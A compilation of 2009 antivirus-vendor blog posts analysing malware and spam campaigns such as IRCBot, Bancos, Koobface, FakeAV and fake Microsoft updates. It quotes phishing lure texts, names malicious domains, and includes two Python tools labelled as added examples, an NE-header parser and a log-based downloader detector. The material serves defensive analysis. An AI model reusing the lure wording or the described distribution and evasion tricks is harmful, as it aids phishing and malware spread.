
Italy: Prime Minister Subject of Spam?

Published: June 29 2009, 05:42 AM | no comments
by Rossano Ferraris

Spammers have used the recent political controversy surrounding the Italian Prime Minister
Silvio Berlusconi to lure and trap Italian-speaking people via an email spam (see Figure 1 and
Figure 2). Italian people who love gossip about public figures may be particularly susceptible to
this type of email.



Figure 1 - Spammed Email

The English translation is:

“Have you seen what our Prime Minister Silvio Berlusconi is doing? Have you followed his story
with the escort?
Thanks to a journalist of LEGGO, we have got the opportunity to see our Premier together with
his escort girl recently appeared on newspapers. If you want to see them, click on the link below:
hxxp://you[BLOCKED].com/watchv=W3k9pMtrccQ.html

TO SEE THE VIDEO YOU NEED TO INSTALL THE FOLLOWING CODEC…”

If we examine the email closely, we see that it pretends to come from YouTube.
However, the email really comes from a certain Youtorube.com (see Figure 1 and Figure 2), which
is hosted on a web server located in Florida with IP address 64.71.35.20.


Figure 2 - Email Header

A link in the email redirects the user to the malicious website “youtorube.com”, which asks the user to
install a new codec to view the video (Figure 3):


Figure 3 - Host website

The new codec is called “wmpcodec.exe”; CA AV detects this file as the worm
“Win32/IRCBot.OQ” and blocks it from running.

Additional Information on Win32/IRCBot.OQ

We managed to follow the communication between the malware file and its IRC server. From
there we found that the bot is monitoring keystrokes, passwords, websites visited and
windows opened on the infected system.

Win32/IRCBot.OQ sends a log of the computing activity of an infected system to the IRC server. This
makes the activity log visible to the malware author and also to other infected systems:
the IRC channel becomes a log file of the activities of all infected machines.

Figure 4 shows how each activity was logged in the IRC channel:


Figure 4 - Communication capture in the IRC channel

It logs usernames and passwords when an infected system accesses a website that contains
'login.php' in the URL.

In addition, it attempts to download other malware to the infected system, which CA detects as
Win32/PolyCrypt!packed.


 

Thanks to Zarestel Ferrer for his contribution to the description of the Win32/IRCBot.OQ malware.


By: Rossano Ferraris
Rossano Ferraris is located in Italy where he lives and works for the CA Internet Security Business Unit (CA ISBU) as a research engineer. He was one of the first employees of PestPatrol and has been working for CA since its acquisition. At CA he has taken the worldwide responsibility for supporting...

Malware finds refuge in school

Published: June 29 2009, 02:37 PM | no comments
by Aaron Faloon

This week in CA Research Labs, while receiving new variants of the popular Bancos Trojan, we successfully traced one of these variants back to its distribution point.

This distribution point is a web server located in the state of New Jersey in the United States of America. The web server is associated with a local school in the area and is used to host its public website.

An interesting point to note is that the school is presently closed for maintenance and, equally important, the school has been dismissed for the summer.

Was this timing intentional on the part of the malware authors, in order to go undetected by the people responsible for monitoring the school's website and network, or purely a coincidence?

[Figure 1 - School Website hosted on web server]

[Figure 2 - Bancos Malware stored on compromised web server]

As well as hosting the school's website, the compromised web server is also hosting Bancos malware. Here we can see the malware files stored in a directory on the compromised web server. These files are made to resemble legitimate banking applications in order to fool the user into entering their banking information, which is then stolen by the attackers.

Anatomy of the Attack

[Figure 3 - Anatomy of the attack]

 

Step 1 - The user's machine gets infected by one of the Bancos download agents. These agents are detected by CA as Win32/Bancos.ORU and Win32/Bancos.ORV.

Step 2 - The infected machine now automatically connects to the compromised web server under the control of the download agents.

Step 3 - Once connected to the compromised web server, the download agents download Win32/Bancos.ONW onto the user's machine.

The system is now infected with a Bancos Trojan, which can steal sensitive information relating to the user's banking habits.

Here we can see the download agents (Win32/Bancos.ORU and Win32/Bancos.ORV) contacting the compromised web server in order to download the Bancos Trojan onto the user's system.

[Figure 4 - Contacting the web server and downloading files]

We can see from Figure 4 that an executable (sidebr.exe) and an image file (c1.bmp) are downloaded to the infected user’s machine. Many more files are downloaded to create the Bancos Trojan application. A few of these files can be seen in Figure 2.

CA currently detects the downloaded Bancos Trojan as Win32/Bancos.ONW.

CA also recommends keeping your security software up to date to prevent a Bancos infection from taking place on your system.

We have also notified the administrator of the compromised web server regarding this issue.

Please read our blog on Banking Trojans - Tips and Tricks for more information on the Bancos Trojan.


By: Aaron Faloon
Aaron Faloon is a Research Engineer with the CA Internet Security Business Unit (CA ISBU) based in Melbourne, Australia. Previous to CA, he spent 2 years at Symantec working as a Security Response Engineer. Aaron holds a BSc in Computer Science and an MSc in Computer Network Security where his studies...

Malware using the _OLD_ New Executable file format

Published: June 23 2009, 01:20 AM | no comments
by Zarestel Ferrer

It is surprising to see 16-bit Windows-based malware now that we have 64-bit technology.
Recently we encountered a malware sample that uses the 16-bit New Executable file format; we detect it as Win16/Tanglinko.A.

 

[Figure 1 – IDA Pro Analysis of the file format]

As you can see in Figure 1, IDA Pro identified the file format as “New Executable (NE) Windows”, the application type as “Console GUI Executable DLL 16 bit” and the file’s expected Windows version as “3.0”. The current version for newer Windows operating systems is 6.0 for Windows Vista and 6.1 for Windows 7, so you can see how old the file format is!

Does this mean the malware is old just because it uses an old file type? Not at all; this is new malware. However, malware authors just can’t leave the past behind and reuse old tricks when developing new malware. Here is the VirusTotal scan result from 21st June 2009.

         

[Figure 2 – Malware dropping files with directory names]

Now, what does this malware do? Apart from its file format, nothing fancy really. However, it is just as annoying as any other average malware we encounter at present. It disables the clipboard, which means the user cannot perform a copy/paste operation, and terminates Windows applications whose window title contains any of the following strings:

• Run
• Search Results
• Select Files and Folders
• System Configuration Utility
• Folder Options
• Display Properties
• Registry Editor
• Command Prompt
• C:\Windows\System32

In case your system has been infected and you want to remove the infection manually, a simple search with Process Explorer for the malware file (usually SYSTIM32.EXE) can help you identify the malware. Please make sure you terminate the NTVDM.EXE instance containing SYSTIM32.exe; terminating the wrong process may give you unwanted results.

         

[Figure 3 – Malware Search]


As you can see it runs under NTVDM.EXE (NT Virtual DOS Machine), which is a Win16 subsystem process under NT-based Windows Operating Systems.
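As an added example (not code from this post or from CA), here is a small Python triage helper that does by hand what IDA reported in Figure 1: it follows the MZ stub’s e_lfanew pointer, tells a 16-bit NE image apart from a PE or a plain DOS program, and reads the NE target OS, application type, library flag and expected Windows version. The header bytes it builds for itself are constructed for illustration and are not the Win16/Tanglinko.A sample.

```python
"""Classify an MZ-stub executable (plain DOS, NE, PE, LE/LX) and, for a 16-bit
New Executable, read the fields IDA showed in Figure 1: target OS, application
type, library flag and expected Windows version.

Added example for this post, not CA's code and not the Win16/Tanglinko.A sample;
the header bytes built by the helpers below are constructed for illustration.
"""
import struct
import sys

# Offsets inside the NE header (relative to the "NE" signature), from the
# Windows 3.x New Executable format.
NE_FLAGS_OFF = 0x0C    # WORD: program flags (data model, application type, library bit)
NE_EXETYP_OFF = 0x36   # BYTE: target operating system
NE_EXPVER_OFF = 0x3E   # WORD: expected Windows version, minor in low byte, major in high byte
NE_HEADER_LEN = 0x40

TARGET_OS = {1: "OS/2", 2: "Windows", 3: "European MS-DOS 4.x",
             4: "Windows/386", 5: "BOSS"}
APP_TYPE = {0x0100: "full screen (not Windows-aware)",
            0x0200: "Windows-compatible",
            0x0300: "uses Windows API"}


def classify_executable(data: bytes) -> dict:
    """Return a dict describing what kind of executable the bytes are."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfarlc = struct.unpack_from("<H", data, 0x18)[0]   # relocation table offset
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]   # offset of a newer header
    # Only when the relocation table sits at 0x40 or later is e_lfanew meaningful;
    # otherwise this is a plain DOS program and 0x3C is just DOS header data.
    if e_lfarlc < 0x40 or e_lfanew + 2 > len(data):
        return {"format": "MZ (DOS)"}
    sig = data[e_lfanew:e_lfanew + 2]
    if sig == b"PE":                       # 32/64-bit Portable Executable ("PE\0\0")
        return {"format": "PE"}
    if sig in (b"LE", b"LX"):              # VxD / OS/2 2.x linear executables
        return {"format": sig.decode()}
    if sig != b"NE":
        return {"format": "MZ (DOS)"}
    return parse_ne_header(data, e_lfanew)


def parse_ne_header(data: bytes, off: int) -> dict:
    """Decode the NE fields that matter when triaging a Win16 sample."""
    if off + NE_HEADER_LEN > len(data):
        raise ValueError("truncated NE header")
    flags = struct.unpack_from("<H", data, off + NE_FLAGS_OFF)[0]
    exetyp = data[off + NE_EXETYP_OFF]
    expver = struct.unpack_from("<H", data, off + NE_EXPVER_OFF)[0]
    return {
        "format": "NE",
        "target_os": TARGET_OS.get(exetyp, "unknown (0x%02x)" % exetyp),
        "app_type": APP_TYPE.get(flags & 0x0300, "none"),
        "is_dll": bool(flags & 0x8000),
        "expected_windows_version": "%d.%d" % (expver >> 8, expver & 0xFF),
    }


def _mz_stub(e_lfanew: int, e_lfarlc: int = 0x40) -> bytearray:
    """Constructed 64-byte DOS header pointing at a newer header at e_lfanew."""
    mz = bytearray(0x40)
    mz[:2] = b"MZ"
    struct.pack_into("<H", mz, 0x18, e_lfarlc)
    struct.pack_into("<I", mz, 0x3C, e_lfanew)
    return mz


def build_sample_ne() -> bytes:
    """Constructed NE image with the properties IDA reported: Windows target,
    uses the Windows API, not a library, expected Windows version 3.0."""
    ne = bytearray(NE_HEADER_LEN)
    ne[:2] = b"NE"
    struct.pack_into("<H", ne, NE_FLAGS_OFF, 0x0300)
    ne[NE_EXETYP_OFF] = 2
    struct.pack_into("<H", ne, NE_EXPVER_OFF, 0x0300)   # major 3, minor 0
    return bytes(_mz_stub(0x40) + ne)


def build_sample_pe() -> bytes:
    """Constructed minimal PE signature behind an MZ stub, for contrast."""
    return bytes(_mz_stub(0x40) + b"PE\0\0")


def build_sample_dos() -> bytes:
    """Constructed plain DOS program: relocation table inside the 0x40 header."""
    return bytes(_mz_stub(0, e_lfarlc=0x1C) + b"\xcd\x20")   # INT 20h: exit


if __name__ == "__main__":
    # Usage: python ne_triage.py <file> ...; with no arguments, show the constructed samples.
    if len(sys.argv) > 1:
        for path in sys.argv[1:]:
            with open(path, "rb") as fh:
                print(path, classify_executable(fh.read()))
    else:
        for name, blob in (("ne", build_sample_ne()), ("pe", build_sample_pe()),
                           ("dos", build_sample_dos())):
            print(name, classify_executable(blob))
```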

To be on the safe side always keep your CA security software updated.


By: Zarestel Ferrer
Zarestel Ferrer is a Senior Research Engineer with CA's Internet Security Business Unit (CA ISBU) based in Melbourne, Australia. Previous to CA, he worked as a software developer and then moved into security as a Senior Anti-virus Engineer at Trend Micro. He also worked for PC Tools Research as a...

Fake Microsoft Updates coming back?

Published: June 16 2009, 11:22 AM | 2 Comment(s)
by Rossano Ferraris

It’s been a while since I saw a fake update email that looked like it came from Microsoft security laboratories. Some people complained to me about a strange email that asked the user to update their machines because of a recent outbreak of the well-known Conficker worm (see Figure 1 and Figure 2).


Figure 1 - Fake Email (part 1)


Figure 2 - Fake Email (part 2)

Let’s take a look at the body of this email, which is very well written and uses persuasive language. The lure in the message is a Microsoft removal tool that will scan and clean the user’s machine.
However, I notice a phrase that says “you are advised to disable your already existing antivirus software.” The spam email reveals itself when I move my mouse pointer over the link “click here to download the removal tool” and discover that the URL redirects the browser to a Russian server (windowsupdate.microsoft.com.ssl3.pop3.ru), which hosts remtool_conf.exe.

If we look at the header, we see the following:


Figure 3 - Email Header

The email comes from a certain Microsoft[dot]ssl[dot]com whose IP address is 38.100.66.185. This IP address belongs to a server located in Texas and is not a Microsoft server.

During the analysis, I download and install remtool_conf.exe:


Figure 4 - Removal Tool License

Then I click on “Accept” and the tool - which seems to belong to Symantec - starts to scan my machine:


Figure 5 - Removal Tool Software

The fake software scans the entire machine, and establishes a hidden connection to the host makemymoneys.com (Figure 6) from which it attempts to download and install the malicious file winupdate.exe, which is detected by CA Security products as “DelfInject CX.”


Figure 6 - makemymoneys.com host hidden connection

CA Security products detect the fake removal tool as “FakeScan A”, warn against it and are able to remove it.

Although there has been a decrease in the number of fake Microsoft update emails, the current fake emails are more sophisticated and use a high-profile social engineering technique to lure and trap people. The CA Research team advises users to be aware of these types of spam messages and to update their anti-malware products on a daily basis.


Koobface Re-Activated!

Published: June 16 2009, 01:17 AM | no comments
by Ricardo Robielos III

Social networking sites are extremely popular these days and, not surprisingly, the latest variant of Win32/Koobface is still taking advantage of this popularity by using these sites as an attack vector.

A variant of Koobface is currently active (as of this posting), sending massive spam messages in several social networking sites such as FaceBook.com, MySpace.com, Friendster.com, Hi5.com, Bebo.com, Fubar.com, MyYearbook.com and Tagged.com.
 
This variant connects to the malicious server "UPR15MAY.COM" to fetch the details of the spam messages it sends to the contacts of affected users who access any of the social networking sites mentioned above. Sample messages are shown below:

For FaceBook.com:

[Sample Facebook Post]
 

[Sample Facebook Message]

For Facebook, this malware connects to "upr15may.com/fb" to generate the spam details to be sent.


For MySpace.com:

[Sample MySpace Message]

For MySpace, this malware connects to "upr15may.com/ms" to generate the spam details to be sent.


For Friendster.com:

[Sample Friendster Message]

For Friendster, this malware connects to "upr15may.com/fr" to generate the spam details to be sent.


For Hi5.com:

[Sample Hi5 Message]

For Hi5, this malware connects to "upr15may.com/hi" to generate the spam details to be sent.


For Bebo.com:

[Sample BeBo Message]

For Bebo, this malware connects to "upr15may.com/be" to generate the spam details to be sent.


For Fubar.com:

[Sample Fubar Message]
 

For Fubar, this malware connects to "upr15may.com/fu" to generate the spam details to be sent.


For MyYearBook.com:

[Sample MyYearbook Message]

For MyYearbook, this malware connects to "upr15may.com/yb" to generate the spam details to be sent.


For Tagged.com:

[Sample Tagged Message]

For Tagged, this malware connects to "upr15may.com/tg" to generate the spam details to be sent.  

 

We issued a simple curl POST request to the malicious server to obtain the list of spam messages that this worm may generate, which gave us the following details:

Title/Subject: (Any of the following)

  •  :)
  •  ;)
  •  HA-HA-HA!!
  •  L.O.L.
  •  lol
  •  OMFG!!!
  •  W.O.W.
  •  WOW

Text/Body: (Any of the following)

  •  A--ha-ha, i saw yoour ass in the internet!! lol
  •  Be more careful next time and get caught again!
  •  Can anyone get busted, or is it just you?
  •  Dammn! Haaven’t you seeen our secrett caamera?
  •  Enjoy your first acting experience in our movie.
  •  Got yoou! Ha--ha, now watcch and crry!
  •  Hey ddude, yoou’re on candiid cammera!
  •  I caan’t beelieve you diddn’t see the ssecret cammera!
  •  Laaugh at oother people?? LLook at yoursself!
  •  Man, you're great! See yourself naked, lol XD
  •  Oh, what a shame, your ass is on our tape.
  •  Prrivate viideo wwith yyou. funnny
  •  YYou're so ppretty ggood on thhis vvideo.


Malicious redirected links (any of the following; please do not visit these sites):


 

The spam messages contain a malicious link that loads a JavaScript file (see the figure below; we detect this JavaScript as a JS/Redirector variant).

This JavaScript redirects web browsers to a fake video site ("YuoTube", misspelled) to download a file "setup.exe", which is also a variant of Win32/Koobface. This variant may in turn download other malicious files such as rogue antivirus programs.

 

We advise users to avoid opening these spam messages when visiting their favorite social networking site and to always keep their CA Antivirus Product up-to-date with the latest signature files.

 

 


By: Ricardo Robielos III
Ricardo Robielos III is a Research Engineer in CA's Internet Security Business Unit (CA ISBU) based in Melbourne, Australia. Previous to CA, Ricardo previously worked for Anchiva Systems as a Malware Researcher and for Trend Micro Inc. as an Anti-virus Engineer. His function now includes analyzing...

Prevalence of Mac Threats

Published: June 15 2009, 12:27 AM | no comments
by Methusela Cebrian Ferrer

“A picture’s worth a thousand words” – Chinese proverb

Figure 01 – Visualizing OS X threat internet distribution

For the past couple of days, I have noticed an aggressive push of Mac trojans, specifically OSX/Jahlav variants.

As shown in Figure 01, OS X threats are distributed primarily over the internet, mostly via Google search results. I have captured a few examples for visualization to show how the scheme is perpetrated by organized gangs. The green area denotes legitimate sources, while the red lines link to affiliate websites that then redirect to malicious servers.

Another noteworthy event is Apple’s Worldwide Developers Conference in San Francisco (WWDC09, Jun 08-12), so it got me wondering whether these attackers are trying to capture attention or whether it's just business as usual.

What is clear to me now is that every day there are Mac users around the world asking for help with this threat. Yes, it requires user intervention to install, but unfortunately the level of sophistication involved in luring users is definitely effective.

Mac users are advised to download and install applications from trusted sources.


Stay safe! 

 

Additional Reading:

http://ithreats.net/2009/06/10/updated-maccinema/ 

http://community.ca.com/blogs/securityadvisor/archive/2009/03/23/latest-mac-threat-maccinema.aspx


By: Methusela Cebrian Ferrer
Methusela Cebrian Ferrer is a Senior Research Engineer with the CA Internet Security Business Unit (CA ISBU) based in Melbourne, Australia. Previous to CA, she spent 5 years on the antivirus service team and R&D group for Trend Micro Internet Security Labs. She also worked with antivirus and anti...

Different Strategies of Win32/FakeAV

Published: June 12 2009, 01:57 AM | no comments
by Mary Grace Gabriel

CA ISBU Research Lab receives a large number of malicious samples on a daily basis, many of which are found to be Rogue Antivirus applications belonging to the extremely prevalent malware family, Win32/FakeAV.  

I recently encountered an interesting sample of Win32/FakeAV, because it is not the usual rogue antivirus application we come across in our labs. This variant imitates the Microsoft Windows Malicious Software Removal Tool (MSRT), as well as promoting a Microsoft Office upgrade and other trusted antivirus products.

Fake Microsoft MSRT Warnings

When the installation package is executed, it displays a fake alert in the system tray, as seen in Figure 01:

[Figure 01 – Fake Alert System Tray]

Then it displays a fake GUI of the Microsoft Windows Malicious Software Removal Tool scanning your system, followed by the scan result shown in Figure 02:

[Figure 02 – Fake MSRT Result]

When the user clicks the Finish button, it displays the following GUI promoting trusted antivirus products, as shown in Figure 03:

[Figure 03 – AV products]

However, when the user clicks the Cancel button, it displays another fake alert in the system tray, as seen in Figure 04:

[Figure 04 – Fake Alert System Tray]

Fake Security Alerts


Another strategy to convince the user to purchase the trusted Antivirus application that it offers is to display a fake error when any of the following Peer-To-Peer applications is executed:

  • BearShare.exe
  • FrostWire.exe
  • LimeWire.exe
  • Phex.exe
  • Phex_debug.exe
  • Shareaza.exe

Example of a fake error message displayed containing a misspelled word:

[Figure 05 – Fake error]

Fake Windows Security Center Warning

Another strategy is to imitate the Windows Security warning.

First, it displays another fake alert in the system tray, as seen in Figure 06, with another misspelled word:

[Figure 06 – Fake Windows Security Center Warning]

Second, it pops up the following GUI that imitates the Windows Security Center:

[Figure 07 – Fake Windows Security Center GUI]

Clicking the Recommendations button takes you to the website www.oem-micro-store.com/winadvisor_avir, which is currently down.

Other Dubious Offers

This variant not only promotes trusted antivirus products, it also offers other products such as a Microsoft Office upgrade.

When Microsoft Word is opened, it displays the following warning offering the user a dubious Microsoft Office upgrade for purchase; see Figure 08:

[Figure 08 – Microsoft Word warning]

When the Yes button is clicked, it takes you to the following website to purchase the upgrade:

[Figure 09 – Microsoft Word upgrade]

Always remember to keep updating your CA security products' signatures.

Till next time…


By: Mary Grace Gabriel
Mary Grace Gabriel is a Research Engineer with CA's Internet Security Business Unit (CA ISBU) based in Melbourne, Australia. Previous to CA, Mary's career in computer security started at Trend Micro as an Anti-virus Engineer, and she also worked as Senior Malware Analyst at Anchiva Systems. She...

Invitations from Fruspam

Published: June 11 2009, 03:56 AM | no comments
by Ricardo Robielos III

A new email is circulating, disguised as a legitimate email from Twitter, Hi5, Amazon or Hallmark. This email carries an attachment containing a mass-mailing worm, which is also capable of propagating via peer-to-peer (P2P) applications such as Limewire, Tesla, WinMX, FrostWire and Grokster. We detect this mass-mailing worm as a Win32/Fruspam variant.

Sample emails are shown below:

Twitter Email

From: invitations@twitter.com
Subject: Your friend invited you to twitter!
Attachment: Invitation Card.zip

Hi5 Email

From: invitations@hi5.com
Subject: Jessica would like to be your friend on hi5!
Attachment: Invitation Card.zip


 
Amazon Email

From: order-update@amazon.com
Subject: Shipping update for your Amazon.com order 254-78546325-658742
Attachment: Shipping documents.zip

Hallmark Email

From: e-cards@hallmark.com
Subject: You have received A Hallmark E-Card!
Attachment: Postcard.zip

It also downloads images from the legitimate websites Twitter.com, hi5.com, amazon.com and hallmark.com and uses them to construct the spam email.

We advise users to beware of these kinds of emails and to ensure that their CA Security Products are using the latest signatures.


Wire Transferred Malware

Published: June 10 2009, 04:02 AM | no comments
by Kenneth Yu

Recently, we have received several emails that seem to target specific companies, advising them on the progress of a wire transfer that they have supposedly followed up on. Figure 1 below shows a sample email.

 

           

[Figure 1: Sample Email]

Attached to this email is the file “detail.rtf”, which supposedly contains the details of this wire transfer. When you open the file in MS Word, you will see the fake error message shown in Figure 2 below:

 

          

[Figure 2: Content]



If you double-click on the message as suggested you will unwittingly execute the embedded malware file, which CA products detect as Win32/SillyDl.NUU.

Please be wary about opening emails that have unknown attachments and always update your signature files.


By: Kenneth Yu
Kenneth Yu is a Research Engineer with CA's Anti-Malware Research team. He graduated with the degree Bachelor of Science in Computer Science Major in Computer Engineering from De La Salle University in Manila, Philippines. His first job was with TrendMicro Philippines and he worked as a Heuristic...

We’ve Got Your Postal Tracking Number!

Published: June 01 2009, 08:53 PM | no comments
by Ricardo Robielos III

Recently at CA Research Labs we have received many spammed emails containing a malicious attachment. This spam disguises itself as a notification email from the United Parcel Service of America (UPS), advising you that the package you sent could not be delivered.

The email contains the following Body:

Hello!

We were not able to deliver postal package you sent on the 14th of May in time
because the recipient's address is not correct.
Please print out the invoice copy attached and collect the package at our office.

Your United Parcel Service of America

It contains a malicious zipped file attachment with the filename starting with any of the following strings:

• UPSTRACKING_
• UPSDocs_
• UPSZN_

The executable inside the zip file has an icon similar to a Microsoft Office Excel file. 

Below are some sample emails showing the different Attachment filenames:

         

 

We detect the malicious executable file attachment as a Win32/Donloz variant.

When executed, Win32/Donloz connects to the malicious server “dollarpoint.ru”  to download other malicious files.

At the time of writing, the downloaded malicious files are Win32/FakeAlert variants that may change how the desktop of the infected system looks, as shown below.

The Win32/FakeAlert may also open a website that points to rogue antivirus software called “AntivirusXP Pro”.

However, this technique is not new; we have received similar spam messages in the past, using the same executable file icon but referring to Western Union instead of UPS (possibly the same malware authors).

         

We advise users to beware of these kinds of emails and to ensure that their CA Security Products are using the latest signatures.


The Allure of Social Networking

Published: May 31 2009, 08:54 PM | no comments
by Methusela Cebrian Ferrer

According to the Nielsen report Global Faces and Networked Places “social networking has been the global consumer phenomenon of 2008. Two-thirds of the world’s internet population visits a social network or blogging site and the sector now accounts for almost 10% of all internet time”. The report also suggests that interest in social networking has surpassed the popularity of emails.

From an information security perspective, this report concurs with our observations regarding the ever increasing number of online threats we are seeing today. Facebook, as the world’s most popular social networking site, cannot escape the attacks targeting its users. 

Win32/Koobface appeared last year and is a family of worms that target MySpace and Facebook users. Since then, this threat has evolved into different versions where it extends its social networking vector as shown in Figure 01.   

                       

Figure 01 – Koobface redirector script routine


Obviously, this redirector script leads to the Koobface malware-serving website, where it lures its target users into manually installing an executable file, as shown in Figure 02.

                 

Figure 02 – Koobface malware-serving website offering users an Adobe Flash Player Installer to install.

Spamming activity on Facebook has apparently been increasing since last week.

For more information on Koobface, please refer to our previous blogs listed below:
• Healthy Malware Server Now Distributing Koobface
• From Koobface: One Video Message Received

What about Twitter? The micro-blogging community is enjoying skyrocketing popularity and, according to Nielsen, has seen a 1382% year-over-year increase in unique visitors (Feb 08 – Feb 09). Unfortunately this huge surge in popularity has attracted attackers, and we have seen serious attacks such as the Mikeyy worm and hacking incidents; there have also been phishing attacks and increasing spam activity.

Furthermore, we are continuously seeing malware (especially relating to porn) and spam distribution through bogus Blogspot blog profiles as shown in Figure 03.  

                              

Figure 03 – Bogus blog profiles

Security researchers are now dealing with different attack vectors and varying technical difficulty. Organized cyber-criminals are mainly building these attacks through automation, enabling massive malware distribution and server-side polymorphism of binaries (EXE, PDF, SWF, etc.) to evade detection by security scanners.

Social networks and growing internet content (such as media) have encouraged users to spend more time on the internet, resulting in greater exposure to internet threats and a dramatic increase in malware. With this, visitors to social networking sites should be on ‘high alert’ for socially engineered tricks to follow links to sites that could be serving malicious content, even from contacts thought to be trusted.

Furthermore, it is very important for everyone participating in social networking activities to report any suspicious or openly malicious activity to keep the internet safe.

My acknowledgement to Michael MacGuire and Kim Thorogood for their valuable contribution to this blog post.


Trojan Downloaders – Crimeware perpetrators

Published: May 28 2009, 09:53 PM | no comments
by Zarestel Ferrer

Trojan downloaders have become one of the main malware categories to dominate CA’s malware collection this year. Most of this malware is very small, some may say lightweight, and its only purpose is to download other malware.

Multiple Downloads

If a system is infected with malware that has "downloader" capabilities, it is highly likely that the malware will fetch more malware to install on the system. Below is an image of the communication between a piece of malware and its server.

[Figure 1 – Downloader contacting server]

As you can see, when a trojan downloader communicates with its server, the result can be multiple downloads of further malicious files, so the affected machine is exposed to further attacks. This behaviour is especially prevalent in crimeware, i.e. malware written for financial gain.

Some downloaders employ extra checks when communicating with their servers. As shown on the left side of Figure 1, the malware files are downloaded via port 88 rather than the usual port 80, while the right side of the image shows that the server only hands out the list of malware once the required information has been sent to it via an HTTP POST. Both make it harder for an automated crawler that simply issues GET requests on port 80 to retrieve the payloads.

PDF and SWF downloaders

Exploit-laden PDF and SWF files are also on the list of Trojan downloaders, and their numbers have increased significantly thanks to server-side automation built to auto-generate such exploit files.

[Figure 2 – Snippet of Exploited PDF]

Check out our previous blog, “Malicious PDF Server Alive and Kicking” for more information.


Rogue Security Software Downloaders

Other notable Trojan downloaders are those that download rogue security software and push fake alert messages.

[Figure 3 – Downloader of Fake Antivirus Programs]

These types of downloaders typically offer something of interest to unsuspecting users, such as fake codecs, porn, or keygens. A downloader may also impersonate a legitimate application such as Flash Player.

Below is the HTTP access log captured after a downloader program, disguised as a porn video provider, fetched a fake antivirus program. The downloader opens the porn site in the default browser and, in the background, downloads the fake antivirus program, in this case WinPC Defender.

[Figure 4 – HTTP access log]
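The two traffic patterns described in this post (executables pulled over a non-standard port only after a POST to the controller, and a downloader quietly fetching several binaries while the user looks at a web page) are easy to hunt for in proxy or gateway logs. The following is an added example, not code from the original post: a small Python log analyser run over a constructed log. The log format, hostnames and file names are assumptions made for the example; only the port 88 / POST-then-download behaviour is taken from the post.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# Constructed proxy log (not the post's Figure 4): timestamp, client, method, URL, status, bytes.
# Client 10.0.0.7 shows the pattern from the post: a POST to the controller on port 88, followed
# by several executables fetched from the same host. Client 10.0.0.9 is ordinary browsing.
SAMPLE_LOG = """\
2009-05-28T21:40:01 10.0.0.7 GET http://video-example.test/watch.php 200 5120
2009-05-28T21:40:02 10.0.0.7 POST http://update-example.test:88/list.php 200 310
2009-05-28T21:40:03 10.0.0.7 GET http://update-example.test:88/files/sec.exe 200 401203
2009-05-28T21:40:05 10.0.0.7 GET http://update-example.test:88/files/inst.exe 200 98304
2009-05-28T21:40:06 10.0.0.7 GET http://update-example.test:88/files/alert.dll 200 20480
2009-05-28T21:45:10 10.0.0.9 GET http://www.example.test/index.html 200 2048
2009-05-28T21:46:00 10.0.0.9 GET http://downloads.example.test/setup.exe 200 1048576
"""

LOG_RE = re.compile(r"^(\S+) (\S+) (GET|POST|HEAD) (\S+) (\d{3}) (\d+)$")
EXECUTABLE_EXT = (".exe", ".dll", ".scr", ".pif", ".com")
WEB_PORTS = {80, 443}


def parse_line(line):
    """Parse one log line into a dict, or return None for lines that do not match the format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts, client, method, url, status, size = m.groups()
    parts = urlsplit(url)
    default_port = 443 if parts.scheme == "https" else 80
    return {"ts": datetime.fromisoformat(ts), "client": client, "method": method, "url": url,
            "host": parts.hostname, "port": parts.port or default_port,
            "path": parts.path, "status": int(status), "bytes": int(size)}


def is_executable(rec):
    """Successful fetch of something that looks like a Windows executable by extension."""
    return rec["status"] == 200 and rec["path"].lower().endswith(EXECUTABLE_EXT)


def analyze(log_text, post_window=timedelta(seconds=60),
            burst_window=timedelta(seconds=120), burst_count=3):
    """Return {client: [(rule, url), ...]} for every executable download that matches a rule."""
    records = [r for r in (parse_line(l) for l in log_text.splitlines()) if r]
    findings = defaultdict(list)
    last_post = {}                  # (client, host) -> time of the most recent POST to that host
    exe_times = defaultdict(list)   # client -> times of its executable downloads
    for r in records:
        key = (r["client"], r["host"])
        if r["method"] == "POST":
            last_post[key] = r["ts"]
            continue
        if not is_executable(r):
            continue
        # Rule 1: executables served from a port other than 80/443 (the post's port 88 case).
        if r["port"] not in WEB_PORTS:
            findings[r["client"]].append(("exe-on-nonstandard-port", r["url"]))
        # Rule 2: the download list was unlocked by a POST to the same host moments earlier.
        if key in last_post and r["ts"] - last_post[key] <= post_window:
            findings[r["client"]].append(("exe-after-post-to-same-host", r["url"]))
        # Rule 3: several executables in a short window, the "multiple downloads" behaviour.
        times = exe_times[r["client"]]
        times.append(r["ts"])
        recent = [t for t in times if r["ts"] - t <= burst_window]
        if len(recent) == burst_count:          # fire once, when the threshold is crossed
            findings[r["client"]].append(("exe-download-burst", r["url"]))
    return dict(findings)


if __name__ == "__main__":
    for client, hits in analyze(SAMPLE_LOG).items():
        for rule, url in hits:
            print(client, rule, url)
```

Only the first client trips the rules; the second client's single setup.exe on port 80 is ignored. Matching on file extension is the weak point of this approach: a downloader that names its payload image.jpg slips through, so a gateway that can see response bodies should key on the MZ header or the Content-Type instead.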

For more information on rogue security software, take a look at our other blogs:

          Spyware Protect 2009 copies malware descriptions
          Double Jeopardy with Privacy Center
          Warning: Dangerous Software – Antivirus XP Pro
          Don’t Get Caught by the XP Police Antivirus!
          Don’t be Fooled by Rogue Software Lifetime Offer


To be on the safe side, be extra cautious in your daily computer activities and remember to always keep your CA security software up to date.


By: Zarestel Ferrer
Zarestel Ferrer is a Senior Research Engineer with CA's Internet Security Business Unit (CA ISBU) based in Melbourne, Australia. Previous to CA, he worked as a software developer and then moved into security as a Senior Anti-virus Engineer at Trend Micro. He also worked for PC Tools Research as a...

Windows Shortcut .LNK - Another Misused File Format

Published: May 27 2009, 10:44 PM | no comments
by Methusela Cebrian Ferrer

Amid the bulk of malicious executables we deal with every day, there is an interesting attack vector that uses Windows Shortcuts, referred to as LNK files because of their .LNK file extension.

These are small files that contain information such as the name and path of the target program they represent. Additionally, LNK files can store the file attributes of the target, its local or network location, command line arguments to pass to it, and the location of the icon to display, which does not have to belong to the target program at all.

A good example of a very common shortcut file you will find on the desktop is the Internet Explorer shortcut. Visually, however, telling a clean shortcut from a malicious one is not easy, because the name and icon are whatever the file's author chose. As a result, you could easily end up executing the file before realising it is suspicious.

